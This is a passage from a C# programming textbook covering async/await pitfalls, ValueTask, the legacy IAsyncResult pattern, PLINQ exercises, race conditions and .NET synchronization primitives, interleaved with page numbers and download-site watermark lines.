private async Task<int> calculateValueAsync(...)
{
// Invoke calculateValue using a Task
Task<int> generateResultTask = Task.Run(() =>
calculateValue(...));
await generateResultTask;
return generateResultTask.Result;
}
This method looks slightly confusing since the return type is specified as
Task<int>, but the return statement actually returns an int. Remember that
when you define an async method, the compiler performs some refactoring of
your code, and it essentially returns a reference to Task that runs the
continuation for the statement return generateResultTask.Result;. The type of
the expression returned by this continuation is int, so the return type of the
method is Task<int>.
To invoke an asynchronous method that returns a value, use the await
Download from finelybook [email protected]
839
operator, like this:
Click here to view code image
int result = await calculateValueAsync(...);
The await operator extracts the value from the Task returned by the
calculateValueAsync method, and in this case assigns it to the result variable.
Asynchronous method gotchas
The async and await operators have been known to cause confusion amongst
programmers. It is important to understand that:
Marking a method as async does not mean that it runs asynchronously.
It means that the method can contain statements that may run
asynchronously.
The await operator indicates that a method should be run by a separate
task, and the calling code is suspended until the method call completes.
The thread used by the calling code is released and can be reused. This
is important if the thread is the user interface thread, as it enables the
user interface to remain responsive.
The await operator is not the same as using the Wait method of a task.
The Wait method always blocks the current thread and does not allow
it to be reused until the task completes.
By default, the code that resumes execution after an await operator
attempts to obtain the original thread that was used to invoke the
asynchronous method call. If this thread is busy, the code will be
blocked. You can use the ConfigureAwait(false) method to specify that
the code can be resumed on any available thread and reduce the
chances of blocking. This is especially useful for web applications and
services that may need to handle many thousands of concurrent
requests.
You shouldn’t use ConfigureAwait(false) if the code that runs after an
await operator must execute on the original thread. In the example
discussed earlier, adding ConfigureAwait(false) to each awaited
operation will result in the likelihood that the continuations the
compiler generates will run on separate threads. This includes the
Download from finelybook [email protected]
840
continuation that attempts to set the Text property for message, causing
the exception “The application called an interface that was marshaled
for a different thread” again.
Click here to view code image
private async void slowMethod()
{
await doFirstLongRunningOperation().ConfigureAwait(false);
await doSecondLongRunningOperation().ConfigureAwait(false);
await doThirdLongRunningOperation().ConfigureAwait(false);
message.Text = "Processing Complete";
}
Careless use of asynchronous methods that return results and that run
on the user interface thread can generate deadlocks, causing the
application to freeze. Consider the following example:
Click here to view code image
private async void myMethod()
{
var data = generateResult();
...
message.Text = $"result: {data.Result}";
}
private async Task<string> generateResult()
{
string result;
...
result = ...
return result;
}
In this code, the generateResult method returns a string value. However,
the myMethod method does not actually start the task that runs the
generateResult method until it attempts to access the data.Result
property; data is a reference to the task, and if the Result property is not
available because the task has not been run, then accessing this property
will block the current thread until the generateResult method completes.
Furthermore, the task used to run the generateResult method attempts to
resume the thread on which it was invoked when the method completes
(the user interface thread), but this thread is now blocked. The result is
that the myMethod method cannot finish until the generateResult method
completes, and the generateResult method cannot finish until the
Download from finelybook [email protected]
841
myMethod method completes.
The solution to this problem is to await the task that runs the
generateResult method. You can do this as follows:
Click here to view code image
private async void myMethod()
{
var data = generateResult();
...
message.Text = $"result: {await data}";
}
Asynchronous methods and the Windows Runtime APIs
The designers of Windows 8 and later versions wanted to ensure that
applications were as responsive as possible, so they made the decision when
they implemented WinRT that any operation that might take more than 50
milliseconds to perform should be available only through an asynchronous
API. You might have noticed one or two instances of this approach already in
this book. For example, to display a message to a user, you can use a
MessageDialog object. However, when you display this message, you must
use the ShowAsync method, like this:
Click here to view code image
using Windows.UI.Popups;
...
MessageDialog dlg = new MessageDialog("Message to user");
await dlg.ShowAsync();
The MessageDialog object displays the message and waits for the user to
click the Close button that appears as part of this dialog box. Any form of
user interaction might take an indeterminate length of time (the user might
have gone for lunch before clicking Close), and it is often important not to
block the application or prevent it from performing other operations (such as
responding to events) while the dialog box is displayed. The MessageDialog
class does not provide a synchronous version of the ShowAsync method, but
if you need to display a dialog box synchronously, you can simply call
dlg.ShowAsync() without the await operator.
Another common example of asynchronous processing concerns the
Download from finelybook [email protected]
842
FileOpenPicker class, which you saw in Chapter 5, “Using compound
assignment and iteration statements.” The FileOpenPicker class displays a
list of files from which the user can select. As with the MessageDialog class,
the user might take a considerable time browsing and selecting files, so this
operation should not block the application. The following example shows
how to use the FileOpenPicker class to display the files in the user’s
Documents folder and wait while the user selects a single file from this list:
Click here to view code image
using Windows.Storage;
using Windows.Storage.Pickers;
...
FileOpenPicker fp = new FileOpenPicker();
fp.SuggestedStartLocation = PickerLocationId.DocumentsLibrary;
fp.ViewMode = PickerViewMode.List;
fp.FileTypeFilter.Add("*");
StorageFile file = await fp.PickSingleFileAsync();
The key statement is the line that calls the PickSingleFileAsync method.
This is the method that displays the list of files and allows the user to
navigate around the file system and select a file. (The FileOpenPicker class
also provides the PickMultipleFilesAsync method by which a user can select
more than one file.) The value returned by this method is
Task<StorageFile>, and the await operator extracts the StorageFile object
from this result. The StorageFile class provides an abstraction of a file held
on hard disk, and by using this class, you can open a file and read from it or
write to it.
Note Strictly speaking, the PickSingleFileAsync method returns an
object of type IAsyncOperation<StorageFile>. WinRT uses its own
abstraction of asynchronous operations and maps .NET Framework
Task objects to this abstraction; the Task class implements the
IAsyncOperation interface. If you are programming in C#, your code is
not affected by this transformation, and you can simply use Task objects
without concerning yourself with how they get mapped to WinRT
asynchronous operations.
Download from finelybook [email protected]
843
File input/output (I/O) is another source of potentially slow operations,
and the StorageFile class implements a raft of asynchronous methods by
which these operations can be performed without impacting the
responsiveness of an application. For example, in Chapter 5, after the user
selects a file using a FileOpenPicker object, the code then opens this file for
reading, asynchronously:
Click here to view code image
StorageFile file = await fp.PickSingleFileAsync();
...
var fileStream = await file.OpenAsync(FileAccessMode.Read);
One final example that is directly applicable to the exercises you have
seen in this and the previous chapter concerns writing to a stream. You might
have noticed that although the time reported to generate the data for the graph
is a few seconds, it can take up to twice that amount of time before the graph
actually appears. This happens because of the way the data is written to the
bitmap. The bitmap renders data held in a buffer as part of the
WriteableBitmap object, and the AsStream extension method provides a
Stream interface to this buffer. The data is written to the buffer via this
stream by using the Write method, like this:
Click here to view code image
...
Stream pixelStream = graphBitmap.PixelBuffer.AsStream();
pixelStream.Seek(0, SeekOrigin.Begin);
pixelStream.Write(data, 0, data.Length);
...
Unless you have reduced the value of the pixelWidth and pixelHeight
fields to save memory, the volume of data written to the buffer is just over
570 MB (15,000 * 10,000 * 4 bytes), so this Write operation can take a few
seconds. To improve response time, you can perform this operation
asynchronously by using the WriteAsync method:
Click here to view code image
await pixelStream.WriteAsync(data, 0, data.Length);
In summary, when you build applications for Windows, you should seek
to exploit asynchronicity wherever possible.
Download from finelybook [email protected]
844
Tasks, memory allocation, and efficiency
Just because a method is tagged as async, it does not mean that it will always
execute asynchronously. Consider the following method:
Click here to view code image
public async Task<int> FindValueAsync(string key)
{
bool foundLocally = GetCachedValue(key, out int result);
if (foundLocally)
return result;
result = await RetrieveValue(key); // possibly takes a long time
AddItemToLocalCache(key, result);
return result;
}
The purpose of this method is to lookup an integer value associated with a
string key; for example, you might be looking up a customer ID given the
customer’s name, or you could be retrieving a piece of data based on a string
containing an encrypted key. The FindValueAsync method implements the
Cache-Aside pattern (see https://docs.microsoft.com/en-
us/azure/architecture/patterns/cache-aside for a detailed discussion of this
pattern), whereby the results of a potentially lengthy calculation or lookup
operation are cached locally when they are performed in case they are needed
again in the near future. If the same key value is passed to a subsequent call
of FindValueAsync, the cached data can be retrieved. The pattern uses the
following helper methods (the implementations of these methods is not
shown):
GetCachedValue. This method checks the cache for an item with the
specified key and passes the item back if it is available, in the out
parameter. The return value of the method is true if the data was found
in the cache, false otherwise.
RetrieveValue. This method runs if the item was not found in the
cache; it performs the calculation or lookups necessary to find the data
and returns it. This method could potentially take a significant time to
run, so it is performed asynchronously.
AddItemToLocalCache. This method adds the specified item to the
local cache in case it is requested again. This will save the application
from having to perform the expensive RetrieveValue operation again.
Download from finelybook [email protected]
845
In an ideal world, the cache will account for the vast majority of the data
requested over the lifetime of the application, and the number of times it is
necessary to invoke RetrieveValue should become shrinkingly small.
Now consider what happens each time your code calls the
FindValueAsync method. In most cases, the work will be performed
synchronously (it finds the data in cache). The data is an integer, but it is
returned wrapped in a Task<int> object. Creating and populating this object,
and then retrieving the data from this object when the method returns,
requires more effort in terms of processing power and memory allocation
than simply returning an int. C# caters to this situation by providing the
ValueTask generic type. You use it to specify the return type of an async
method, but the return value is marshaled as a value type on the stack rather
than a reference on the heap:
Click here to view code image
public async ValueTask<int> FindValueAsync(string key)
{
bool foundLocally = GetCachedValue(key, out int result);
if (foundLocally)
return result;
result = await RetrieveValue(key); // possibly takes a long time
AddItemToLocalCache(key, result);
return result;
}
Note that this does not mean that you should always use ValueTask rather
than Task. If an asynchronous method actually performs the await operation,
then using ValueTask can decrease the efficiency of your code quite
significantly, for reasons that I don’t have time or space to go into here. So,
in general, consider returning a ValueTask object only if the vast majority of
the calls to an async method are likely to be performed synchronously,
otherwise stick to the Task type.
Note To use the ValueTask type, you must use the NuGet Package
Manager to add the System.Threading,Tasks,Extensions package to
your project.
Download from finelybook [email protected]
846
The IAsyncResult design pattern in earlier versions
of the .NET Framework
Asynchronicity has long been recognized as a key element in building
responsive applications with the .NET Framework, and the concept
predates the introduction of the Task class in the .NET Framework
version 4.0. Microsoft introduced the IAsyncResult design pattern based
on the AsyncCallback delegate type to handle these situations. The
exact details of how this pattern works are not appropriate in this book,
but from a programmer’s perspective the implementation of this pattern
meant that many types in the .NET Framework class library exposed
long-running operations in two ways: in a synchronous form consisting
of a single method, and in an asynchronous form that used a pair of
methods, named BeginOperationName and EndOperationName, where
OperationName specified the operation being performed. For example,
the MemoryStream class in the System.IO namespace provides the Write
method to write data synchronously to a stream in memory, but it also
provides the BeginWrite and EndWrite methods to perform the same
operation asynchronously. The BeginWrite method initiates the write
operation that is performed on a new thread. The BeginWrite method
expects the programmer to provide a reference to a callback method that
runs when the write operation completes; this reference is in the form of
an AsyncCallback delegate. In this method, the programmer should
implement any appropriate tidying up and call the EndWrite method to
signify that the operation has completed. The following code example
shows this pattern in action:
Click here to view code image
...
Byte[] buffer = ...; // populated with data to write to the
MemoryStream
MemoryStream ms = new MemoryStream();
AsyncCallback callback = new
AsyncCallback(handleWriteCompleted);
ms.BeginWrite(buffer, 0, buffer.Length, callback, ms);
...
private void handleWriteCompleted(IAsyncResult ar)
Download from finelybook [email protected]
847
{
MemoryStream ms = ar.AsyncState as MemoryStream;
...// Perform any appropriate tidying up
ms.EndWrite(ar);
}
The parameter to the callback method (handleWriteCompleted) is an
IAsyncResult object that contains information about the status of the
asynchronous operation and any other state information. You can pass
user-defined information to the callback in this parameter; the final
argument supplied to the BeginOperationName method is packaged into
this parameter. In this example, the callback is passed a reference to the
MemoryStream.
Although this sequence works, it is a messy paradigm that obscures
the operation you are performing. The code for the operation is split
into two methods, and it is easy to lose the mental connection between
these methods if you have to maintain this code. If you are using Task
objects, you can simplify this model by calling the static FromAsync
method of the TaskFactory class. This method takes the
BeginOperationName and EndOperationName methods and wraps them
into code that is performed by using a Task. There is no need to create
an AsyncCallback delegate because this is generated behind the scenes
by the FromAsync method. So you can perform the same operation
shown in the previous example like this:
Click here to view code image
...
Byte[] buffer = ...;
MemoryStream s = new MemoryStream(); Task t =
Task<int>.Factory.FromAsync(s.Beginwrite, s.EndWrite, buffer, 0,
buffer.Length, null);
t.Start();
await t;
...
This technique is useful if you need to access asynchronous
functionality exposed by types developed in earlier versions of the
.NET Framework.
Download from finelybook [email protected]
848
Using PLINQ to parallelize declarative data access
Data access is another area for which response time is important, especially if
you are building applications that have to search through lengthy data
structures. In earlier chapters, you saw how powerful LINQ is for retrieving
data from an enumerable data structure, but the examples shown were
inherently single-threaded. Parallel LINQ (PLINQ) provides a set of
extensions to LINQ that is based on Tasks, and that can help you boost
performance and parallelize some query operations.
PLINQ works by dividing a data set into partitions and then using tasks to
retrieve the data that matches the criteria specified by the query for each
partition in parallel. When the tasks have completed, the results retrieved for
each partition are combined into a single enumerable result set. PLINQ is
ideal for scenarios that involve data sets with large numbers of elements, or if
the criteria specified for matching data involve complex, computationally
expensive operations.
An important aim of PLINQ is to be as nonintrusive as possible. To
convert a LINQ query into a PLINQ query, you use the AsParallel extension
method. The AsParallel method returns a ParallelQuery object that acts
similarly to the original enumerable object, except that it provides parallel
implementations of many of the LINQ operators, such as join and where.
These implementations of the LINQ operators are based on tasks and use
various algorithms to try to run parts of your LINQ query in parallel
wherever possible. However, as ever in the world of parallel computing, the
AsParallel method is not magic. You cannot guarantee that your code will
speed up; it all depends on the nature of your LINQ queries and whether the
tasks they are performing lend themselves to parallelization.
To understand how PLINQ works and the situations in which it is useful,
it helps to see some examples. The exercises in the following sections
demonstrate a pair of simple scenarios.
Using PLINQ to improve performance while iterating
through a collection
The first scenario is simple. Consider a LINQ query that iterates through a
Download from finelybook [email protected]
849
collection and retrieves elements from the collection based on a processor-
intensive calculation. This form of query can benefit from parallel execution
as long as the calculations are independent. The elements in the collection
can be divided into some partitions; the exact number depends on the current
load of the computer and the number of CPUs available. The elements in
each partition can be processed by a separate thread. When all the partitions
have been processed, the results can be merged. Any collection that supports
access to elements through an index, such as an array or a collection that
implements the IList<T> interface, can be managed in this way.
Parallelize a LINQ query over a simple collection
1. Using Visual Studio 2017, open the PLINQ solution, which is located in
the \Microsoft Press\VCSBS\Chapter 24\PLINQ folder in your
Documents folder.
2. In Solution Explorer, double-click Program.cs in the PLINQ project to
display the file in the Code and Text Editor window.
This is a console application. The skeleton structure of the application
has been created for you. The Program class contains methods named
Test1 and Test2 that illustrate a pair of common scenarios. The Main
method calls each of these test methods in turn.
Both test methods have the same general structure: they create a LINQ
query (you will add the code to do this later in this set of exercises), run
it, and display the time taken. The code for each of these methods is
almost completely separate from the statements that actually create and
run the queries.
3. Examine the Test1 method.
This method creates a large array of integers and populates it with a set
of random numbers between 0 and 200. The random number generator
is seeded, so you should get the same results every time you run the
application.
4. Immediately after the first TO DO comment in this method, add the
LINQ query shown here in bold:
Click here to view code image
Download from finelybook [email protected]
850
// TO DO: Create a LINQ query that retrieves all numbers that
are greater than 100
var over100 = from n in numbers
where TestIfTrue(n > 100)
select n;
This LINQ query retrieves all the items in the numbers array that have a
value greater than 100. The test n > 100 is not by itself computationally
intensive enough to show the benefits of parallelizing this query, so the
code calls a method named TestIfTrue, which slows it down a little by
performing a SpinWait operation. The SpinWait method causes the
processor to continually execute a loop of special “no operation”
instructions for a short period, keeping the processor busy but not
actually doing any work. (This is known as spinning.) The TestIfTrue
method looks like this:
Click here to view code image
public static bool TestIfTrue(bool expr)
{
Thread.SpinWait(100);
return expr;
}
5. After the second TO DO comment in the Test1 method, add the
following code shown in bold:
Click here to view code image
// TO DO: Run the LINQ query, and save the results in a
List<int> object
List<int> numbersOver100 = new List<int>(over100);
Remember that LINQ queries use deferred execution, so they do not run
until you retrieve the results from them. This statement creates a
List<int> object and populates it with the results of running the over100
query.
6. After the third TO DO comment in the Test1 method, add the following
statement shown in bold:
Click here to view code image
// TO DO: Display the results
Console.WriteLine($"There are {numbersOver100.Count} numbers
over 100");
Download from finelybook [email protected]
851
7. On the Debug menu, click Start Without Debugging. Note the time that
running Test 1 takes and the number of items in the array that are greater
than 100.
8. Run the application several times, and take an average of the time.
Verify that the number of items greater than 100 is the same each time
(the application uses the same random number seed each time it runs to
ensure the repeatability of the tests). Return to Visual Studio when you
have finished.
9. The logic that selects each item returned by the LINQ query is
independent of the selection logic for all the other items, so this query is
an ideal candidate for partitioning. Modify the statement that defines the
LINQ query, and specify the AsParallel extension method to the
numbers array, as shown here in bold:
Click here to view code image
var over100 = from n in numbers.AsParallel()
where TestIfTrue(n > 100)
select n;
Note If the selection logic or calculations require access to shared
data, you must synchronize the tasks that run in parallel; otherwise,
the results might be unpredictable. However, synchronization can
impose an overhead and might negate the benefits of parallelizing
the query.
10. On the Debug menu, click Start Without Debugging. Verify that the
number of items reported by Test1 is the same as before but that the time
taken to perform the test has decreased significantly. Run the test several
times, and take an average of the duration required for the test.
If you are running on a dual-core processor (or a twin-processor
computer), you should see the time reduced by 40 to 45 percent. If you
have more processor cores, the decrease should be even more dramatic
(on my quad-core machine, the processing time dropped from 8.3
Download from finelybook [email protected]
852
seconds to 2.4).
11. Close the application, and return to Visual Studio.
The preceding exercise shows the performance improvement you can
attain by making a small change to a LINQ query. However, keep in mind
that you will see results such as this only if the calculations performed by the
query take some time. I cheated a little by spinning the processor. Without
this overhead, the parallel version of the query is actually slower than the
serial version. In the next exercise, you will see a LINQ query that joins two
arrays in memory. This time, the exercise uses more realistic data volumes,
so there is no need to slow down the query artificially.
Parallelize a LINQ query that joins two collections
1. In Solution Explorer, open the Data.cs file in the Code and Text Editor
window and locate the CustomersInMemory class.
This class contains a public string array called Customers. Each string in
the Customers array holds the data for a single customer, with the fields
separated by commas; this format is typical of data that an application
might read in from a text file that uses comma-separated fields. The first
field contains the customer ID, the second field contains the name of the
company that the customer represents, and the remaining fields hold the
address, city, country or region, and postal code.
2. Find the OrdersInMemory class.
This class is similar to the CustomersInMemory class except that it
contains a string array called Orders. The first field in each string is the
order number, the second field is the customer ID, and the third field is
the date that the order was placed.
3. Find the OrderInfo class. This class contains four fields: the customer
ID, company name, order ID, and order date for an order. You will use a
LINQ query to populate a collection of OrderInfo objects from the data
in the Customers and Orders arrays.
4. Display the Program.cs file in the Code and Text Editor window and
locate the Test2 method in the Program class.
Download from finelybook [email protected]
853
In this method, you will create a LINQ query that joins the Customers
and Orders arrays by using the customer ID to return a list of customers
and the orders that each customer has placed. The query will store each
row of the result in an OrderInfo object.
5. In the try block in this method, after the first TO DO comment, add the
code shown next in bold:
Click here to view code image
// TO DO: Create a LINQ query that retrieves customers and
orders from arrays
// Store each row returned in an OrderInfo object
var orderInfoQuery =
from c in CustomersInMemory.Customers
join o in OrdersInMemory.Orders
on c.Split(',')[0] equals o.Split(',')[1]
select new OrderInfo
{
CustomerID = c.Split(',')[0],
CompanyName = c.Split(',')[1],
OrderID = Convert.ToInt32(o.Split(',')[0]),
OrderDate = Convert.ToDateTime(o.Split(',')[2],
new CultureInfo("en-US"))
};
This statement defines the LINQ query. Notice that it uses the Split
method of the String class to split each string into an array of strings.
The strings are split on the comma character. (The commas are stripped
out.) One complication is that the dates in the array are held in United
States English format, so the code that converts them into DateTime
objects in the OrderInfo object specifies the United States English
formatter. If you use the default formatter for your locale, the dates
might not parse correctly. All in all, this query performs a significant
amount of work to generate the data for each item.
6. In the Test2 method, after the second TO DO statement, add the
following code shown in bold:
Click here to view code image
// TO DO: Run the LINQ query, and save the results in a
List<OrderInfo> object
List<OrderInfo> orderInfo = new List<OrderInfo>(orderInfoQuery);
This statement runs the query and populates the orderInfo collection.
Download from finelybook [email protected]
854
7. After the third TO DO statement, add the statement shown here in bold:
Click here to view code image
// TO DO: Display the results
Console.WriteLine($"There are {orderInfo.Count} orders");
8. In the Main method, comment out the statement that calls the Test1
method and uncomment the statement that calls the Test2 method, as
shown in the following code in bold:
Click here to view code image
static void Main(string[] args)
{
// Test1();
Test2();
}
9. On the Debug menu, click Start Without Debugging.
10. Verify that Test2 retrieves 830 orders, and note the duration of the test.
Run the application several times to obtain an average duration, and then
return to Visual Studio.
11. In the Test2 method, modify the LINQ query and add the AsParallel
extension method to the Customers and Orders arrays, as shown here in
bold:
Click here to view code image
var orderInfoQuery =
from c in CustomersInMemory.Customers.AsParallel()
join o in OrdersInMemory.Orders.AsParallel()
on c.Split(',')[0] equals o.Split(',')[1]
select new OrderInfo
{
CustomerID = c.Split(',')[0],
CompanyName = c.Split(',')[1],
OrderID = Convert.ToInt32(o.Split(',')[0]),
OrderDate = Convert.ToDateTime(o.Split(',')[2],
new CultureInfo("en-US"))
};
Download from finelybook [email protected]
855
Warning When you join two data sources in this way, they must
both be IEnumerable objects or ParallelQuery objects. This means
that if you specify the AsParallel method for one source, you
should also specify AsParallel for the other. If you fail to do this,
your code will not run—it will stop with an error.
12. Run the application several times. Notice that the time taken for Test2
should be significantly less than it was previously. PLINQ can make use
of multiple threads to optimize join operations by fetching the data for
each part of the join in parallel.
13. Close the application and return to Visual Studio.
These two simple exercises have shown you the power of the AsParallel
extension method and PLINQ. Note that PLINQ is an evolving technology,
and the internal implementation is very likely to change over time.
Additionally, the volumes of data and the amount of processing you perform
in a query also have a bearing on the effectiveness of using PLINQ.
Therefore, you should not regard these exercises as defining fixed rules that
you should always follow. Rather, they illustrate the point that you should
carefully measure and assess the likely performance or other benefits of using
PLINQ with your own data, in your own environment.
Canceling a PLINQ query
Unlike with ordinary LINQ queries, you can cancel a PLINQ query. To do
this, you specify a CancellationToken object from a
CancellationTokenSource and use the WithCancellation extension method of
the ParallelQuery.
Click here to view code image
CancellationToken tok = ...;
...
var orderInfoQuery =
from c in
CustomersInMemory.Customers.AsParallel().WithCancellation(tok)
join o in OrdersInMemory.Orders.AsParallel()
on ...
Download from finelybook [email protected]
856
You specify WithCancellation only once in a query. Cancellation applies
to all sources in the query. If the CancellationTokenSource object used to
generate the CancellationToken is canceled, the query stops with an
OperationCanceledException exception.
Synchronizing concurrent access to data
PLINQ is not always the most appropriate technology to use for an
application. If you create your own tasks manually, you need to ensure that
these tasks coordinate their activities correctly. The .NET Framework class
library provides methods with which you can wait for tasks to complete, and
you can use these methods to coordinate tasks at a very coarse level. But
consider what happens if two tasks attempt to access and modify the same
data. If both tasks run at the same time, their overlapping operations might
corrupt the data. This situation can lead to bugs that are difficult to correct,
primarily because of their unpredictability.
The Task class provides a powerful framework with which you can design
and build applications that take advantage of multiple CPU cores to perform
tasks in parallel. However, you need to be careful when building solutions
that perform concurrent operations, especially if those operations share access
to data. You have little control over how parallel operations are scheduled or
even the degree of parallelism that the operating system might provide to an
application constructed by using tasks. These decisions are left as run-time
considerations and depend on the workload and hardware capabilities of the
computer running your application. This level of abstraction was a deliberate
design decision on the part of the Microsoft development team, and it
removes the need for you to understand the low-level threading and
scheduling details when you build applications that require concurrent tasks.
But this abstraction comes at a cost. Although it all appears to work
magically, you must make some effort to understand how your code runs;
otherwise, you can end up with applications that exhibit unpredictable (and
erroneous) behavior, as shown in the following example (this sample is
available in the ParallelTest project in the folder containing the code for
Chapter 24):
Click here to view code image
Download from finelybook [email protected]
857
using System;
using System.Threading;
class Program
{
private const int NUMELEMENTS = 10;
static void Main(string[] args)
{
SerialTest();
}
static void SerialTest()
{
int[] data = new int[NUMELEMENTS];
int j = 0;
for (int i = 0; i < NUMELEMENTS; i++)
{
j = i;
doAdditionalProcessing();
data[i] = j;
doMoreAdditionalProcessing();
}
for (int i = 0; i < NUMELEMENTS; i++)
{
Console.WriteLine($"Element has value {data[i]}");
}
}
static void doAdditionalProcessing()
{
Thread.Sleep(10);
}
static void doMoreAdditionalProcessing()
{
Thread.Sleep(10);
}
}
The SerialTest method populates an integer array with a set of values (in a
rather long-winded way) and then iterates through this list, printing the index
of each item in the array together with the value of the corresponding item.
The doAdditionalProcessing and doMoreAdditionalProcessing methods
simply simulate the performance of long-running operations as part of the
processing that might cause the runtime to yield control of the processor. The
output of the program method is shown here:
Click here to view code image
Download from finelybook [email protected]
858
Element 0 has value 0
Element 1 has value 1
Element 2 has value 2
Element 3 has value 3
Element 4 has value 4
Element 5 has value 5
Element 6 has value 6
Element 7 has value 7
Element 8 has value 8
Element 9 has value 9
Now consider the ParallelTest method, shown next. This method is the
same as the SerialTest method except that it uses the Parallel.For construct
to populate the data array by running concurrent tasks. The code in the
lambda expression run by each task is identical to that in the initial for loop in
the SerialTest method.
Click here to view code image
using System.Threading.Tasks;
...
static void ParallelTest()
{
int[] data = new int[NUMELEMENTS];
int j = 0;
Parallel.For (0, NUMELEMENTS, (i) =>
{
j = i;
doAdditionalProcessing();
data[i] = j;
doMoreAdditionalProcessing();
});
for (int i = 0; i < NUMELEMENTS; i++)
{
Console.WriteLine($"Element has value {data[i]}");
}
}
The intention is for the ParallelTest method to perform the same operation
as the SerialTest method, except by using concurrent tasks and (with good
luck) running a little faster as a result. The problem is that it might not always
work as expected. Some sample output generated by the ParallelTest method
is shown here:
Click here to view code image
Element 0 has value 8
Element 1 has value 9
Download from finelybook [email protected]
859
Element 2 has value 8
Element 3 has value 9
Element 4 has value 8
Element 5 has value 9
Element 6 has value 9
Element 7 has value 9
Element 8 has value 8
Element 9 has value 8
The values assigned to each item in the data array are not always the same
as the values generated by using the SerialTest method. Additionally, further
runs of the ParallelTest method can produce different sets of results.
If you examine the logic in the Parallel.For construct, you should see
where the problem lies. The lambda expression contains the following
statements:
Click here to view code image
j = i;
doAdditionalProcessing();
data[i] = j;
doMoreAdditionalProcessing();
The code looks innocuous enough. It copies the current value of the
variable i (the index variable identifying which iteration of the loop is
running) into the variable j, and later on it stores the value of j in the element
of the data array indexed by i. If i contains 5, j is assigned the value 5, and
later on the value of j is stored in data[5]. But between assigning the value to
j and then reading it back, the code does more work; it calls the
doAdditionalProcessing method. If this method takes a long time to execute,
the runtime might suspend the thread and schedule another task. A concurrent
task that is running another iteration of the Parallel.For construct might run
and assign a new value to j. Consequently, when the original task resumes,
the value of j it assigns to data[5] is not the value it stored, and the result is
data corruption. More troublesome is that sometimes this code might run as
expected and produce the correct results, and at other times it might not; it all
depends on how busy the computer is and when the various tasks are
scheduled. Consequently, these types of bugs can lie dormant during testing
and then suddenly manifest in a production environment.
The variable j is shared by all the concurrent tasks. If a task stores a value
in j and later reads it back, it has to ensure that no other task has modified j in
Download from finelybook [email protected]
860
the meantime. This requires synchronizing access to the variable across all
concurrent tasks that can access it. One way in which you can achieve
synchronized access is to lock data.
Locking data
The C# language provides locking semantics through the lock keyword,
which you can use to guarantee exclusive access to resources. You use the
lock keyword like this:
Click here to view code image
object myLockObject = new object();
...
lock (myLockObject)
{
// Code that requires exclusive access to a shared resource
...
}
The lock statement attempts to obtain a mutual-exclusion lock over the
specified object (you can actually use any reference type, not just object), and
it blocks if this same object is currently locked by another thread. When the
thread obtains the lock, the code in the block following the lock statement
runs. At the end of this block, the lock is released. If another thread is
blocked waiting for the lock, it can then grab the lock and continue its
processing.
Synchronization primitives for coordinating tasks
The lock keyword is fine for many simple scenarios, but in some situations,
you might have more complex requirements. The System.Threading
namespace includes some additional synchronization primitives that you can
use to address these situations. These synchronization primitives are classes
designed for use with tasks; they expose locking mechanisms that restrict
access to a resource while a task holds the lock. They support a variety of
locking techniques that you can use to implement different styles of
concurrent access, ranging from simple exclusive locks (where a single task
has sole access to a resource), to semaphores (where multiple tasks can
access a resource simultaneously but in a controlled manner), to reader/writer
Download from finelybook [email protected]
861
locks that enable different tasks to share read-only access to a resource while
guaranteeing exclusive access to a thread that needs to modify the resource.
The following list summarizes some of these primitives. For more
information and examples, consult the documentation provided with Visual
Studio 2017.
Note The .NET Framework has included a respectable set of
synchronization primitives since its initial release. The following list
describes only the more recent primitives included in the
System.Threading namespace. There is some overlap between the new
primitives and those provided previously. Where overlapping
functionality exists, you should use the more recent alternatives because
they have been designed and optimized for computers with multiple
CPUs.
A detailed discussion of the theory of all the possible
synchronization mechanisms available for building multithreaded
applications is beyond the scope of this book. For more information
about the general theory of multiple threads and synchronization, see
the topic “Synchronizing Data for Multithreading” in the documentation
provided with Visual Studio 2017.
ManualResetEventSlim The ManualResetEventSlim class provides
functionality by which one or more tasks can wait for an event.
A ManualResetEventSlim object can be in one of two states: signaled
(true) and unsignaled (false). A task creates a ManualResetEventSlim
object and specifies its initial state. Other tasks can wait for the
ManualResetEventSlim object to be signaled by calling the Wait method.
If the ManualResetEventSlim object is in the unsignaled state, the Wait
method blocks the tasks. Another task can change the state of the
ManualResetEventSlim object to signaled by calling the Set method.
This action releases all tasks waiting on the ManualResetEventSlim
Download from finelybook [email protected]
862
object, which can then resume running. The Reset method changes the
state of a ManualResetEventSlim object back to unsignaled.
SemaphoreSlim You can use the SemaphoreSlim class to control
access to a pool of resources.
A SemaphoreSlim object has an initial value (a nonnegative integer) and
an optional maximum value. Typically, the initial value of a
SemaphoreSlim object is the number of resources in the pool. Tasks
accessing the resources in the pool first call the Wait method. This
method attempts to decrement the value of the SemaphoreSlim object,
and if the result is nonzero, the thread is allowed to continue and can
take a resource from the pool. When it has finished, the task should call
the Release method on the SemaphoreSlim object. This action
increments the value of the Semaphore.
If a task calls the Wait method and the result of decrementing the value
of the SemaphoreSlim object would result in a negative value, the task
waits until another task calls Release.
The SemaphoreSlim class also provides the CurrentCount property,
which you can use to determine whether a Wait operation is likely to
succeed immediately or will result in blocking.
CountdownEvent You can think of the CountdownEvent class as a
cross between the inverse of a semaphore and a manual reset event.
When a task creates a CountdownEvent object, it specifies an initial
value (a nonnegative integer). One or more tasks can call the Wait
method of the CountdownEvent object, and if its value is nonzero, the
tasks are blocked. Wait does not decrement the value of the
CountdownEvent object; instead, other tasks can call the Signal method
to reduce the value. When the value of the CountdownEvent object
reaches zero, all blocked tasks are signaled and can resume running.
A task can set the value of a CountdownEvent object back to the value
specified in its constructor by using the Reset method, and a task can
increase this value by calling the AddCount method. You can determine
whether a call to Wait is likely to block by examining the CurrentCount
property.
Download from finelybook [email protected]
863
ReaderWriterLockSlim The ReaderWriterLockSlim class is an
advanced synchronization primitive that supports a single writer and
multiple readers. The idea is that modifying (writing to) a resource
requires exclusive access, but reading a resource does not; multiple
readers can access the same resource at the same time, but not at the
same time as a writer.
A task that wants to read a resource calls the EnterReadLock method of
a ReaderWriterLockSlim object. This action grabs a read lock on the
object. When the task has finished with the resource, it calls the
ExitReadLock method, which releases the read lock. Multiple tasks can
read the same resource at the same time, and each task obtains its own
read lock.
When a task modifies the resource, it can call the EnterWriteLock
method of the same ReaderWriterLockSlim object to obtain a write lock.
If one or more tasks currently have a read lock for this object, the
EnterWriteLock method blocks until they are all released. After a task
has a write lock, it can then modify the resource and call the
ExitWriteLock method to release the lock.
A ReaderWriterLockSlim object has only a single write lock. If another
task attempts to obtain the write lock, it is blocked until the first task
releases this write lock.
To ensure that writing tasks are not blocked indefinitely, as soon as a
task requests the write lock, all subsequent calls to EnterReadLock made
